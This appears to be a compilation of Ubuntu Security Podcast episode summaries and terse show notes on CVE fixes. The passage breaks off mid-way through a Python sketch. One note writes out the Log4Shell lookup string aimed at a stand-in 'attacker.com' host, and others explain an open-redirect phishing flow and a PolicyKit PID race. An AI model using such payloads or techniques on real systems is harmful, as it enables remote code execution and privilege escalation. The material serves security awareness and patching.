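sudo usg fix disa_stig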
The DISA-STIG automated configuration tooling for Ubuntu 20.04 LTS is available with Ubuntu Advantage subscriptions and Ubuntu Pro, alongside additional open source security and support services.
https://ubuntu.com/blog/ubuntu-introduces-the-ubuntu-security-guide-to-ease-disa-stig-compliance
Ubuntu 21.04 goes EOL soon, plus we cover security updates for Django, the Linux kernel, Apache httpd2 + Log4j2, Ghostscript and more.
28 unique CVEs addressed
Storage.save() with crafted file names
dictsort template filter to disclose info or make method calls when passing in a crafted key - Django upstream remind that you should always validate user input before use
mmap() or SYSV shmem syscalls with the SHM_HUGETLB flag
TIPC + MSG_CRYPTO OOB write, and Firewire OOB write - both can be used by local unprivileged users to cause DoS / possible code execution
ProxyRequests on)

The Ubuntu Security Podcast is back for 2022 and we’re starting off the year with a bang💥! This week we bring you a special interview with Kees Cook of Google and the Linux Kernel Self Protection Project discussing Linux kernel hardening upstream developments. Plus we look at security updates for Mumble, Apache Log4j2, OpenJDK and more.
31 unique CVEs addressed
smb to then refer to a .desktop file
QDesktopServices::openUrl function
100 Continue responses - malicious HTTP server could cause a DoS against clients - affects all

Happy holidays! This week we bring you the second part of a special two-part holiday themed feature by Camila from the Ubuntu Security team discussing how best to protect yourself and your systems from the top cyber threats faced during the holidays.
Happy holidays! This week we bring you the first part of a special two-part holiday themed feature by Camila from the Ubuntu Security team discussing the top cyber threats faced during the holidays.
Just in time for the holidays, Log4Shell comes along to wreck everyone’s weekend - so we take a deep dive into the vulnerability that has set the internet on fire, plus we cover security updates for BlueZ, Firefox, Flatpak and more.
27 unique CVEs addressed
GLIB_CHARSETALIAS_DIR env var, could then possibly exploit setuid binaries like pkexec which are linked against glib to possibly read root-owned files - fixed to just have glib not read and use this environment variable
Updated log4j2 to 2.15.0 for Ubuntu >= 20.04 LTS and otherwise removed the offending class in Ubuntu 18.04 etc (USN-5192-1)
${jndi:ldap://attacker.com/malware} - Log4j will perform the lookup via LDAP to retrieve the Java class at that URI and then execute it (java/org/apache/logging/log4j/core/lookup/JndiLookup)
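Since that mitigation works by deleting the JndiLookup class, one blunt way to audit a deployment is to scan its jars for the class - a sketch, assuming unzip is available and adjusting the search root to your application:

# flag any jar still carrying the class removed by USN-5192-1
find /opt -name '*.jar' 2>/dev/null | while read -r jar; do
  unzip -l "$jar" 2>/dev/null \
    | grep -q 'log4j/core/lookup/JndiLookup.class' \
    && echo "contains JndiLookup: $jar"
done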
A further update to 2.16.0 was done - this is now in Ubuntu >= 20.04 LTS as well (USN-5197-1)

A preview of some things to come for the Ubuntu Security Podcast plus we cover security updates for Samba, uriparser, libmodbus, MariaDB, Mailman and more.
38 unique CVEs addressed
A gnarly old bug in NSS is unearthed, plus we cover security updates for ICU, the Linux kernel and ImageMagick as well.
20 unique CVEs addressed
This week we put out a call for testing and feedback on proposed Samba updates for Ubuntu 18.04 LTS plus we look at security updates for Mailman, Thunderbird, LibreOffice, BlueZ and more.
15 unique CVEs addressed
This week we discuss some of the challenges and trade-offs encountered when providing security support for ageing software, plus we discuss security updates for the Linux kernel, Firejail, Samba, PostgreSQL and more.
42 unique CVEs addressed
~/.pam_environment to keep settings in sync

This week we look at some details of the 29 unique CVEs addressed across the supported Ubuntu releases in the past 7 days and more.
29 unique CVEs addressed
docker login
but also had configured
credsStore
and credsHelper
in ~/.docker/config.json
and these were not
able to be executed (ie. execute bit not set or not in $PATH
), then creds
would get sent to the public docker registry rather than the configured private registry.
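For context, the configuration in question looks roughly like the following - "pass" is just one example helper; docker prefixes the name with docker-credential- and needs the result to be executable and on $PATH:

# ~/.docker/config.json
#   { "credsStore": "pass" }
# docker will try to execute docker-credential-pass for registry
# operations - verify it actually resolves and is executable:
command -v docker-credential-pass && ls -l "$(command -v docker-credential-pass)"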
The road to Ubuntu 22.04 LTS begins so we look at some of its planned features plus we cover security updates for the Linux kernel, Mailman, Apport, PHP, Bind and more.
92 unique CVEs addressed
/var/lib/apport/coredump
nftables backend in ufw so it can drive nftables directly rather than iptables
pivot_root in AppArmor - when a pivot_root occurs, AppArmor loses track of the original paths so if a root level process is granted pivot_root permission, can move around inside its own mount namespace to be able to escape outside the AppArmor policy

Ubuntu 20.04 LTS targeted at Tianfu Cup 2021 plus we cover security updates for Linux kernel, nginx, Ardour and strongSwan.
24 unique CVEs addressed
Standard_D48_v3 instance (48 vCPUs, 192GB RAM, 1.2TB storage) - dropped that patch to resolve the issue

It’s release week! As Ubuntu 21.10 Impish Indri is released we take a look at some of the new security features it brings, plus we cover security updates for containerd, MongoDB, Mercurial, docker.io and more.
58 unique CVEs addressed
FileNameUtils.normalize() - should remove relative path components like ../ but if contained leading double-slashes this would fail - and the original path would be returned without alteration - so could then possibly get relative directory traversal to the parent directory depending on how this returned value was used.
io_uring (5.1) - unprivileged user - trigger free of other kernel memory - code execution
docker cp - could craft a container image that would result in docker cp making changes to existing files on the host filesystem - doesn’t actually allow to read/modify or execute files on the host but could make them readable/change perms etc and expose info on the host

This week we look at a Wifi lookalike attack dubbed “SSID stripping” plus updates for ca-certificates, EDK II, Apache, the Linux kernel and even vim!
28 unique CVEs addressed
mod_proxy - so could lead to request splitting / cache poisoning
mod_proxy_uwsgi - crash / info leak
ap_escape_quotes() if given malicious input - modules in apache itself don’t pass untrusted input to this but other 3rd party modules might
mod_proxy - forward the request to an origin server as specified in the request - SSRF
SetHandler config option for mod_proxy that broke various configurations using unix sockets - these got interpreted more like URIs and so would be seen as invalid - broke Plesk and others - upstream then issued further fixes which we released in a follow-up
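The style of configuration that regressed is common for PHP-FPM deployments - something like this hypothetical vhost fragment (the socket path is an example):

# hand .php requests to a local FPM daemon over a unix socket
<FilesMatch "\.php$">
    SetHandler "proxy:unix:/run/php/php-fpm.sock|fcgi://localhost"
</FilesMatch>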
io_uring (5.1) - unprivileged user - trigger free of other kernel memory - code execution
wpa_supplicant, NetworkManager, gnome-shell etc)

Extended Security Maintenance gets an extension, Linux disk encryption and authentication goes under the microscope and we cover security updates for libgcrypt, the Linux kernel, Python, and more.
20 unique CVEs addressed
ioctl()
/usr, encrypted, authenticated /etc, /var and per-user /home/user encryption using their own login password

RELEASE | RELEASE DATE | END OF LIFE*
---|---|---
Ubuntu 14.04 (Trusty Tahr) | April 2014 | April 2024 (from April 2022)
Ubuntu 16.04 (Xenial Xerus) | April 2016 | April 2026 (from April 2024)
Ubuntu 18.04 (Bionic Beaver) | April 2018 | April 2028 (unchanged)
Ubuntu 20.04 (Focal Fossa) | April 2020 | April 2030 (unchanged)
OWASP Top 10 gets updated for 2021 and we look at security vulnerabilities in the Linux kernel, Ghostscript, Git, curl and more.
26 unique CVEs addressed
This week we discuss compiler warnings as build errors in the Linux kernel, plus we look at security updates for HAProxy, GNU cpio, PySAML2, mod-auth-mellon and more.
15 unique CVEs addressed
///
- an attacker could craft a URL
that specified a particular URL via the ReturnTo
parameter and this would
then automatically redirect the user to that crafted URL - so could be
used for phishing attacks that look more trustworthy. ie. an attacker
creates a phishing site that copies the victim site at their own
domain. they then send an email to a user asking them to login and they
specify a URL to the real victim site but with the ReturnTo
parameter set
to their own site - a user looking at this URL will see it specifies the
real site so won’t be concerned - when they visit it they get
automatically redirected to the attacker’s copy of the site - so if they don’t then check
the URL they will start logging into the fake phishing site and not the
real one - fixed to just reject these URLs so they don’t get abused by
the redirect process
COMPILE_TEST is enabled - this is used as a flag to tell the kernel to compile everything even if it is not being used - and is then often used by CI systems / developers who explicitly want to compile everything and work on detecting new warnings

This week we look at a malware campaign associated with the popular Krita painting application, plus we cover security updates for MongoDB, libssh, Squashfs-Tools, Thunderbird and more.
17 unique CVEs addressed
This week we dive into Trend Micro’s recent Linux Threat Report and the release of Ubuntu 20.04.3 LTS, plus we detail security updates for Inetutils telnetd, the Linux kernel and OpenSSL.
9 unique CVEs addressed
EVP_PKEY_decrypt()
twice - call
first time to get the required buffer size to hold the decrypted
plaintext - second time to do the actual decryption passing a buffer of
the specified length to hold the result

This week we look at security updates for Firefox, PostgreSQL, MariaDB, HAProxy, the Linux kernel and more, plus we cover some current openings on the team - come join us ☺
35 unique CVEs addressed
This week Ubuntu 20.04 LTS was FIPS 140-2 certified plus the AppArmor project made some point releases, and we released security updates for Docker, Perl, c-ares, GPSd and more.
2 unique CVEs addressed
This week we discuss new kernel memory hardening and security development proposals from Ubuntu Security Alumnus Kees Cook, plus we look at details of security updates for WebKitGTK, libsndfile, GnuTLS, exiv2 and more.
22 unique CVEs addressed
It’s another week when too many security updates are never enough as we cover 240 CVE fixes across Avahi, QEMU, the Linux kernel, containerd, binutils and more, plus the Ubuntu 20.10 Groovy Gorilla end-of-life.
240 unique CVEs addressed
Is npm audit more harm than good? Plus this week we look at security updates for DjVuLibre, libuv, PHP and more.
8 unique CVEs addressed
This week we look at some new Linux kernel security features including the Landlock LSM and Core Scheduling plus we cover security updates for RabbitMQ, Ceph, Thunderbird and more.
46 unique CVEs addressed
Ubuntu One opens up two-factor authentication for all, plus we cover security updates for Nettle, libxml2, GRUB2, the Linux kernel and more.
73 unique CVEs addressed
In this week’s episode we look at how to get media coverage for your shiny new vulnerability, plus we cover security updates for ExifTool, ImageMagick, BlueZ and more.
49 unique CVEs addressed
This week we cover security updates for the Linux kernel, PolicyKit, Intel Microcode and more, plus we look at a report of an apparent malicious snap in the Snap Store and some of the mechanics behind snap confinement.
42 unique CVEs addressed
This week we look at DMCA notices sent against Ubuntu ISOs plus security updates for nginx, DHCP, Lasso, Django, Dnsmasq and more.
24 unique CVEs addressed
This week we’re talking about moving IRC networks plus security updates for Pillow, Babel, Apport, X11 and more.
24 unique CVEs addressed
With 60 CVEs fixed across MySQL, Django, Please and the Linux kernel this week we take a look at some of these details, plus look at the recent announcement of 1Password for Linux and some open positions on the team too.
60 unique CVEs addressed
This week we look at some details of the 90 unique CVEs addressed across the supported Ubuntu releases and more.
90 unique CVEs addressed
This week we look at the response from the Linux Technical Advisory Board to the UMN Linux kernel incident, plus we cover the 21Nails Exim vulnerabilities as well as updates for Bind, Samba, OpenVPN and more.
40 unique CVEs addressed
With 21 CVEs fixed this week we look at updates for Dnsmasq, Firefox, OpenJDK and more, plus we discuss the recent release of Ubuntu 21.04 and malicious commits in the upstream Linux kernel.
21 unique CVEs addressed
This week we look at a reboot of the DWF project, Rust in the Linux kernel, an Ubuntu security webinar plus some details of the 45 CVEs addressed across the Ubuntu releases this last week and more.
45 unique CVEs addressed
This week we look at how Ubuntu is faring at Pwn2Own 2021 (which still has 1 day and 2 more attempts at pwning Ubuntu 20.10 to go) plus we look at security updates for SpamAssassin, the Linux kernel, Rack and Django, and we cover some open positions on the Ubuntu Security team too.
14 unique CVEs addressed
This week we look at 2 years of 14.04 ESM, a kernel Livepatch issue, DNS-over-HTTPS for Google Chrome plus security updates for ldb, OpenSSL, Squid, curl and more.
38 unique CVEs addressed
This week we look at security updates for containerd, Ruby, the Linux kernel, Pygments and more, plus we cover some open positions within the team as well.
28 unique CVEs addressed
This week we start preparing for 16.04 LTS to transition to Extended Security Maintenance, plus we look at security updates for OpenSSH, Python, the Linux kernel and more, as well as some currently open positions on our team.
28 unique CVEs addressed
This week we check on the status of the pending GRUB2 Secure Boot updates and detail some open positions within the team, plus we look at security updates for GLib, zstd, Go, Git and more.
7 unique CVEs addressed
This week we talk about more BootHole-like vulnerabilities in GRUB2, a Spectre exploit found in-the-wild, security updates for xterm, screen, Python, wpa_supplicant and more.
52 unique CVEs addressed
This week we discuss security updates in Linux Mint, Google funding Linux kernel security development and details for security updates in BIND, OpenSSL, Jackson, OpenLDAP and more.
14 unique CVEs addressed
This week we take a look at a long-awaited update of Thunderbird in Ubuntu 20.04LTS, plus security updates for Open vSwitch, JUnit 4, PostSRSd, GNOME Autoar and more.
14 unique CVEs addressed
This week we take a deep dive look at 2 recent vulnerabilities in the popular application containerisation frameworks, snapd and flatpak, plus we cover security updates for MiniDLNA, PHP-PEAR, the Linux kernel and more.
26 unique CVEs addressed
This week we discuss the recent high profile vulnerability found in libcrypt 1.9.0, plus we look at updates for the Linux kernel, XStream, Django, Apport and more.
66 unique CVEs addressed
In the first episode for 2021 we bring back Joe McManus to discuss the SolarWinds hack plus we look at vulnerabilities in sudo, NVIDIA graphics drivers and mutt. We also cover some open positions in the team and say farewell to long-time Ubuntu Security superstar Jamie Strandboge.
22 unique CVEs addressed
For the last episode of 2020, we look back at the most “popular” packages on this podcast for this year as well as the biggest vulnerabilities from 2020, plus a BootHole presentation at Ubuntu Masters as well as vulnerability fixes from the past week too.
21 unique CVEs addressed
This week we look at security updates for Mutt, Thunderbird, Poppler, QEMU, containerd, Linux kernel & more, plus we discuss the 2020 State of the Octoverse Security Report from Github, Launchpad GPG keyserver migration, a new AppArmor release & some open positions on the team.
68 unique CVEs addressed
This week we look at updates for c-ares, PulseAudio, phpMyAdmin and more, plus we cover security news from the Ubuntu community including planning for 16.04 LTS to transition to ESM, libgcrypt FIPS cerified for 18.04 LTS and a proposal for making home directories more secure for upcoming Ubuntu releases as well.
48 unique CVEs addressed
This week we look at vulnerabilities in MoinMoin, OpenLDAP, Kerberos, Raptor (including a discussion of CVE workflows and the oss-security mailing list) and more, whilst in community news we talk about the upcoming AppArmor webinar, migration of Ubuntu CVE information to ubuntu.com and reverse engineering of malware by the Canonical Sustaining Engineering team.
45 unique CVEs addressed
This week we look at results from the Tianfu Cup 2020, the PLATYPUS attack against Intel CPUs, a detailed writeup of the GDM/accountsservice vulnerabilities covered in Episode 95 and more.
23 unique CVEs addressed
This week we look at vulnerabilities in Samba, GDM, AccountsService, GOsa and more, plus we cover some AppArmor related Ubuntu Security community updates as well.
26 unique CVEs addressed
This week we cover news of the CITL drop of 7000 “vulnerabilities”, the Ubuntu Security disclosure and embargo policy plus we look at security updates for pip, blueman, the Linux kernel and more.
117 unique CVEs addressed
This week we cover security updates for NTP, Brotli, Spice, the Linux kernel (including BleedingTooth) and a FreeType vulnerability which is being exploited in-the-wild, plus we talk about the NSAs report into the most exploited vulnerabilities as well as the release of Ubuntu 20.10 Groovy Gorilla.
74 unique CVEs addressed
1 CVE addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM)
DCCP protocol mishandled reuse of sockets, leading to a UAF - since can be done by a local user could lead to root code execution, priv esc etc - was reported to Canonical and we worked with upstream kernel devs on resolving this etc
It’s CVE bankruptcy! With a deluge of CVEs to cover from the last 2 weeks, we take a particular look at the ZeroLogon vulnerability in Samba this week, plus Alex covers the AppArmor 3 release and some recent / upcoming webinars hosted by the Ubuntu Security team.
121 unique CVEs addressed
This week we look at security updates for GUPnP, OpenJPEG, bsdiff and more.
24 unique CVEs addressed
This week we look at security updates for the X server, the Linux kernel and GnuTLS plus we preview the upcoming AppArmor3 release that is slated for Ubuntu 20.10 (Groovy Gorilla).
20 unique CVEs addressed
This week we farewell Joe McManus plus we look at security updates for Firefox, Chrony, Squid, Django, the Linux kernel and more.
59 unique CVEs addressed
This week we talk antivirus scanners and false positives in the Ubuntu archive, plus we look at security updates for QEMU, Bind, Net-SNMP, sane-backends and more.
56 unique CVEs addressed
sudo apt install jq
xdg-open "https://www.virustotal.com/gui/file/$(sha256sum /usr/bin/jq | cut -f1 -d' ')"
This week we look at the Drovorub Linux malware outed by the NSA/FBI plus we detail security updates for Dovecot, Apache, Salt, the Linux kernel and more.
24 unique CVEs addressed
This week we discuss the recent announcement of a long-awaited native client for 1password, plus Google Chrome experiments with anti-phishing techniques, and we take a look at security updates for OpenJDK 8, Samba, NSS and more.
13 unique CVEs addressed
Dr. Levi Perigo is our special guest this week to discuss SDN and NFV with Joe, plus Alex does the weekly roundup of security updates, including Ghostscript, Squid, Apport, Whoopsie, libvirt and more.
37 unique CVEs addressed
In a week when too many security updates are never enough, we cover the biggest one of them all for a while, BootHole, with an interview between Joe McManus and Alex Murray for some behind-the-scenes and in-depth coverage, plus we also look briefly at the other 100-odd CVEs for the week in FFmpeg, OpenJDK, LibVNCServer, ClamAV and more.
109 unique CVEs addressed
This week Joe talks Linux Security Modules stacking with John Johansen and Steve Beattie plus Alex looks at security updates for snapd, the Linux kernel and more.
24 unique CVEs addressed
With Ubuntu 19.10 going EOL, we have a special interview by Joe with Chris Coulson and Steve Beattie from the Ubuntu Security Team to talk TPMs and Ubuntu Core 20, plus Alex looks at some of the 71 CVEs addressed by the team and more.
71 unique CVEs addressed
Joe talks cyber security policy with Dr David Reed from CU Boulder, plus Alex covers the week in security updates including Mutt, NVIDIA graphics drivers, Mailman and more.
6 unique CVEs addressed
This week, Sid Faber and Kyle Fazzari of the Ubuntu Robotics team interview Vijay Sarvepalli from CERT about the recent Ripple20 vulnerabilities announcement, plus we look at security updates for Bind, Mutt, curl and more.
8 unique CVEs addressed
This week Joe discusses Intel’s CET announcement with John Johansen, plus Alex details recent security fixes including SQLite, fwupd, NSS, DBus and more.
24 unique CVEs addressed
Return Oriented Programming (ROP) https://en.wikipedia.org/wiki/Return-oriented_programming
Sigreturn Oriented Programming (SROP) https://en.wikipedia.org/wiki/Sigreturn-oriented_programming
Jump/Call Oriented Programming (JOP) https://www.csc2.ncsu.edu/faculty/xjiang4/pubs/ASIACCS11.pdf
Control-flow Enforcement technology (CET)
CFI in software
Kernel
gcc
glibc
LLVM/Clang
CET on windows
Pre CET software based CFI on windows
Papers/talks on attacking CET/CFI
Smashing the stack for fun and profit
StackClash
SRBDS aka CrossTalk, the latest Intel speculative execution attack, is the big news this week in security updates for Ubuntu, as well as fixes for GnuTLS, Firefox and more, plus Alex and Joe talk about using STRIDE for threat modelling of software products.
39 unique CVEs addressed
This week we look at security updates for Unbound, OpenSSL, Flask, FreeRDP, Django and more, plus Joe and Alex discuss the Octopus malware infecting Netbeans projects.
40 unique CVEs addressed
This week we welcome back Vineetha Kamath, Ubuntu Security Certifications Manager, to discuss the recent release of FIPS modules for Ubuntu 18.04 LTS and we look at security updates for Bind, ClamAV, QEMU, the Linux kernel and more.
24 unique CVEs addressed
In episode 75 we look at security updates for APT, json-c, Bind, the Linux kernel and more, plus Joe and Alex discuss recent phishing attacks and the Wired biopic of Marcus Hutchins.
26 unique CVEs addressed
Special guest, Tim McNamara, author of Rust In Action talks all things Rust plus we look at security updates for Linux bluetooth firmware, OpenLDAP, PulseAudio, Squid and more.
17 unique CVEs addressed
1 CVE addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
email address looking invalid it would be echo’d back to the user - and so anything supplied as the email address would be displayed
After the recent release of Ubuntu 20.04 LTS, we look at security fixes for OpenJDK, CUPS, the Linux kernel, Samba and more, plus Joe and Alex discuss robot kits and the Kaiji botnet.
86 unique CVEs addressed
A huge number of CVEs fixed in the various Ubuntu releases, including for PHP, Git, Thunderbird, GNU binutils and more, plus Joe McManus discusses ROS with Sid Faber.
93 unique CVEs addressed
This week Joe discusses Ubuntu’s involvement in ZDI’s Pwn2Own with special guests Steve Beattie and Marc Deslauriers from the Ubuntu Security team, plus we do the usual roundup of fixed vulnerabilities including libssh, Thunderbird, Git and a kernel Livepatch.
38 unique CVEs addressed
This week we have a great interview between Joe McManus and Emilia Torino from the Ubuntu Security team, plus we cover security updates for Apport, Firefox, GnuTLS, the Linux kernel and more.
18 unique CVEs addressed
This week we cover security updates for a Linux kernel vulnerability disclosed during pwn2own, Timeshift, pam-krb5 and more, plus we have a special guest, Vineetha Kamath, to discuss security certifications for Ubuntu.
10 unique CVEs addressed
This week we cover security updates for Apache, Twisted, Vim a kernel livepatch and more, plus Alex and Joe discuss OVAL data feeds and the cvescan snap for vulnerability awareness.
16 unique CVEs addressed
A big week in security updates, including the Linux kernel, Ceph, ICU, Firefox, Dino and more, plus Joe and Alex discuss tips for securely working from home in light of Coronavirus.
38 unique CVEs addressed
This week we cover security updates for Django, runC and SQLite, plus Alex and Joe discuss the AMD speculative execution Take A Way attack and we look at some recent blog posts by the team too.
16 unique CVEs addressed
Whilst avoiding Coronavirus, this week we look at updates for libarchive, OpenSMTPD, rake and more, plus Joe and Alex discuss ROS, the Robot Operating System and how the Ubuntu Security Team is involved in the ongoing development of secure foundations for robotics.
7 unique CVEs addressed
This week we look at security updates for ppp, Squid, rsync + more, and Joe and Alex discuss the wide scope of the Ubuntu Security Team including some current open positions.
19 unique CVEs addressed
Security updates for Firefox, QEMU, Linux kernel, ClamAV and more, plus we discuss our recommended reading list for getting into infosec and farewell long-time member of the Ubuntu Security Team / community Tyler Hicks.
54 unique CVEs addressed
This week Alex and Joe take an indepth look at the recent Sudo vulnerability CVE-2019-18634 plus we look at security updates for OpenSMTPD, systemd, Mesa, Yubico PIV tool and more. We also look at a recent job opening for a Robotics Security Engineer to join the Ubuntu Security team.
33 unique CVEs addressed
Joe is back to discuss a recent breach against Wawa, plus we detail security updates from the past week including Apache Solr, OpenStack Keystone, Sudo, Django and more.
23 unique CVEs addressed
Security updates for python-apt, GnuTLS, tcpdump, the Linux kernel and more, plus we look at plans to integrate Ubuntu Security Notices within the main ubuntu.com website.
91 unique CVEs addressed
After a weeks break we are back to look at updates for ClamAV, GnuTLS, nginx, Samba and more, plus we briefly discuss the current 20.04 Mid-Cycle Roadmap Review sprint for the Ubuntu Security Team
73 unique CVEs addressed
In the first episode for 2020, we look at security updates for Django and the Linux kernel, plus Alex and Joe discuss security and privacy aspects of smart assistant connected devices.
34 unique CVEs addressed
In the final episode of 2019, we look at security updates for RabbitMQ, GraphicsMagick, OpenJDK and more, plus Joe and Alex discuss a typical day-in-the-life of a Ubuntu Security Team member.
34 unique CVEs addressed
In the second to last episode for 2019, we look at security updates for Samba, Squid, Git, HAProxy and more, plus Alex and Joe discuss Evil Corp hacker indictments, unsecured AWS S3 buckets and more.
43 unique CVEs addressed
This week we cover security updates for NSS, SQLite, the Linux kernel and more, plus Joe and Alex discuss a recent FBI advisory warning about possible dangers of Smart TVs.
49 unique CVEs addressed
Security updates for DPDK, Linux kernel, QEMU, ImageMagick, Ghostscript and more, plus Joe and Alex talk about how to get into information security.
89 unique CVEs addressed
This week we look at the details of the latest Intel hardware vulnerabilities, including security updates for the Linux kernel and Intel microcode, plus Bash, cpio, FriBidi and more.
26 unique CVEs addressed
This week we look at security updates for FreeTDS, HAProxy, Nokogiri, plus some regressions in Whoopsie, Apport and Firefox, and Joe and Alex discuss the release of 14.04 ESM for personal use under the Ubuntu Advantage program.
9 unique CVEs addressed
In this Halloween Special, Joe and Alex talk about what scares them in security, plus we look at security updates for Firefox, PHP, Samba, Whoopsie, Apport and more.
26 unique CVEs addressed
5 CVEs addressed in Xenial, Bionic, Disco, Eoan
Kevin Backhouse from Semmle Security Research Team
Sander Bos
Alex and Joe discuss the big news of this week - the release of Ubuntu 19.10 Eoan Ermine - plus we look at updates for the Linux kernel, libxslt, UW IMAP and more.
51 unique CVEs addressed
This week we look at updates for Sudo, Python, OpenStack Octavia and more, plus we discuss a recent CVE for Python which resulted in erroneous scientific research results, and we go over some of your feedback from Episode 48.
27 unique CVEs addressed
This week we look at security updates for the Linux kernel, SDL 2, ClamAV and more, plus Alex and Joe talk security and performance trade-offs, snaps and OWASP Top 10 Cloud Security recommendations, and finally Alex covers some recent concerns about the security of the Snap Store.
31 unique CVEs addressed
We catch up on details of the past few weeks of security updates, including Python, curl, Linux kernel, Exim and more, plus Alex and Joe discuss the recent Ubuntu Engineering Sprint in Paris and building a HoneyBot for Admin Magazine.
93 unique CVEs addressed
A massive 85 CVEs addressed this week, including updates for Exim, the Linux Kernel, Samba, systemd and more, plus we discuss hacking BMCs via remote USB devices and password stashes.
85 unique CVEs addressed
This week we look at security updates for Dovecot, Ghostscript, a livepatch update for the Linux kernel, Ceph and Apache, plus Alex and Joe discuss recent Wordpress plugin vulnerabilities and the Hostinger breach, and more.
22 unique CVEs addressed
7 CVEs addressed in Xenial, Bionic, Disco
HTTP/2 DoS issue (Internal Data Buffering) - Episode 43 for nginx
Open redirect in mod_rewrite if have self-referential redirects
Stack buffer overflow + NULL pointer dereference in mod_remoteip
Possible XSS in mod_proxy where the link shown on error pages could be controlled by an attacker - but only possible where configured with proxying enabled but misconfigured so that the Proxy Error page is shown.
UAF (read) during HTTP/2 connection shutdown
HTTP/2 push - allows server to send resources to a client before it requests them - could overwrite memory of the server’s request pool - this is preconfigured and not under control of client but could cause a crash etc.
HTTP/2 upgrade - can configure to automatically upgrade HTTP/1.1 requests to HTTP/2 - but if this was not the first request on the connection could lead to crash
This week Joe and Alex discuss a recently disclosed backdoor in Webmin, plus we cover security updates from the past week, including for Nova, KDE, LibreOffice, Docker, CUPS and more.
21 unique CVEs addressed
This week we cover vulnerabilities in Ghostscript, the Linux kernel, nginx and more, and we follow up last weeks interview with another interview with Jamie Strandboge, this time talking about the history of the Ubuntu Security team.
53 unique CVEs addressed
This week we have a special interview with Ubuntu Security Team member Jamie Strandboge, talking about security aspects of the Snap packaging system, as well as the usual roundup of security fixes from the past week.
7 unique CVEs addressed
With Alex and Joe having been away at a Canonical sprint last week, we look back at the past fortnight’s security updates including new Linux kernel releases, MySQL, VLC, Django and more plus we discuss a recent Citrix password spraying attack.
90 unique CVEs addressed
Episode 40 (memory corruption issues)
Big roundup of security updates from the past 2 weeks including Docker, ZeroMQ, Squid, Redis and more, plus we talk with Joe McManus about some recent big fines for companies breaching their GDPR responsibilities and it’s EOL for Ubuntu 18.10 Cosmic Cuttlefish.
62 unique CVEs addressed
A look at security updates for Django, Thunderbird, ZNC, Irssi and more, plus news on the CanonicalLtd GitHub account credentials compromise, SKS PGP keyservers under attack and Ubuntu 18.10 Cosmic Cuttlefish reaches EOL.
7 unique CVEs addressed
i - The name of this is checked in various places to ensure control characters and other means of code execution are blocked, but not on all code-paths using modules
This week we look at the latest security updates for the Linux kernel, Firefox, ImageMagick, OpenStack and more, plus we have a special guest, the maintainer and lead developer of the AppArmor project, John Johansen, to talk about the project and some of the upcoming features.
55 unique CVEs addressed
The big news this week is SackPANIC! updates for the Linux kernel, plus we look at vulnerabilities in, and updates for, Samba, SQLite, Bind, Thunderbird and more, and we are hiring!
36 unique CVEs addressed
Security updates for DBus, vim, elfutils, GLib and more, plus Joe and Alex look at another npm package hijack as well as some wider discussions around the big vim RCE of this week.
43 unique CVEs addressed
We look at vulnerabilities and updates for Exim, the Linux kernel, Berkeley DB, Qt and more, plus Joe and Alex discuss some recent malware campaigns including Hiddenwasp, and we cover some open positions too.
34 unique CVEs addressed
This week we look at security updates for Keepalived, Corosync, GnuTLS, libseccomp and more, plus we talk insider threats with Joe McManus.
32 unique CVEs addressed
Updated Intel microcode for Cherry Trail + Bay Trail CPUs, fixes for vulnerabilities in curl, Firefox, PHP and MariaDB, plus we talk configuration of virtualised guests to mitigate speculative execution vulnerabilities as well as plans for the Ubuntu 19.10 development cycle.
43 unique CVEs addressed
This week we look at updates to cover the latest Intel CPU vulnerabilities (MDS - aka RIDL, Fallout, ZombieLoad), plus other vulnerabilities in PostgreSQL, ISC DHCP, Samba and more, whilst this week’s special guest is Seth Arnold from the Ubuntu Security Team to talk Main Inclusion Review code audits.
37 unique CVEs addressed
This week we cover security fixes for GNOME Shell, FFmpeg, Sudo, Ghostscript and others, and we talk to Joe McManus about malicious DockerHub images, Git repos being ransomed and more.
14 unique CVEs addressed
Fixes for 19 different vulnerabilities across MySQL, Dovecot, Memcached and others, plus we talk to Joe McManus about the recent iLnkP2P IoT hack and the compromise of DockerHub’s credentials database and more.
19 unique CVEs addressed
This week we look at fixes from the past two weeks including BIND, NTFS-3G, Dovecot, Pacemaker and more, plus we follow up last episode’s IoT security discussion with Joe McManus talking about Ubuntu Core. Finally we cover the release of Ubuntu 19.04 Disco Dingo and the transition of Ubuntu 14.04 Trusty Tahr to Extended Security Maintenance.
53 unique CVEs addressed
This week we look at updates for vulnerabilities in wpa_supplicant, Samba, systemd, wget and more, and we talk to Joe about IoT security (or the prevailing lack thereof).
27 unique CVEs addressed
Carpe Diem for Apache HTTP Server, plus updates for Dovecot, PolicyKit and the Linux kernel, and we talk to Joe McManus about the recent Asus ShadowHammer supply chain attack and more.
52 unique CVEs addressed
This week we look at security updates for a heap of packages including Firefox & Thunderbird, PHP & QEMU, plus we discuss Facebook’s recent password storage incident as well as some listener hardening tips and more.
48 unique CVEs addressed
Ghostscript is back to haunt us for another week, plus we look at vulnerabilities in ntfs-3g, snapd, firefox and more.
39 unique CVEs addressed
A look at recent fixes for vulnerabilities in poppler, WALinuxAgent, the Linux kernel and more. We also talk about some listener feedback on Ubuntu hardening and the launch of Ubuntu 14.04 ESM.
18 unique CVEs addressed
This week we look at security updates for the Linux kernel, PHP and NVIDIA drivers, including recent research into GPU-based side-channel attacks, plus we call for suggestions on hardening features and more.
10 unique CVEs addressed
PolicyKit provides the ability to authorise an application to perform privileged actions
Pops up a dialog for the user to authorise via password - PolicyKit then caches that authorisation (for 5 minutes)
To identify the same process in future, it would look at both the PID and the process start time, to guard against PID reuse etc - see the sketch below
However, the fork() system call is not atomic, so an attacker could call sys_clone() at the same time as the real process so that their process gets the same start time. They can then cause the kernel to block on the return to the attacker’s process, effectively racing against the real process: waiting for it to end and for PID allocation to cycle around until the attacker’s process ends up with the same (reused) PID as the original authorised process (and the same start time) - effectively fooling PolicyKit into treating it as the real, authorised process
The fix was to make the kernel’s fork() effectively atomic with respect to the recorded start time, rather than trying to fix PolicyKit, since this can’t effectively be done at the process level
The kernel was fixed to record the process start time later in the fork procedure, so it is much closer to the point where the process becomes visible to userspace - and after userspace has had a chance to delay it - mitigating the race
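A minimal sketch of the (PID, start time) identity check being raced here - this is not PolicyKit’s actual code, just an illustration of reading the kernel-recorded start time that the fix now records later in fork():

```python
import os

def start_time(pid: int) -> int:
    """Return a process's start time in clock ticks since boot -
    field 22 ("starttime") of /proc/<pid>/stat."""
    with open(f"/proc/{pid}/stat", "rb") as f:
        stat = f.read()
    # comm (field 2) can itself contain spaces or parentheses, so only
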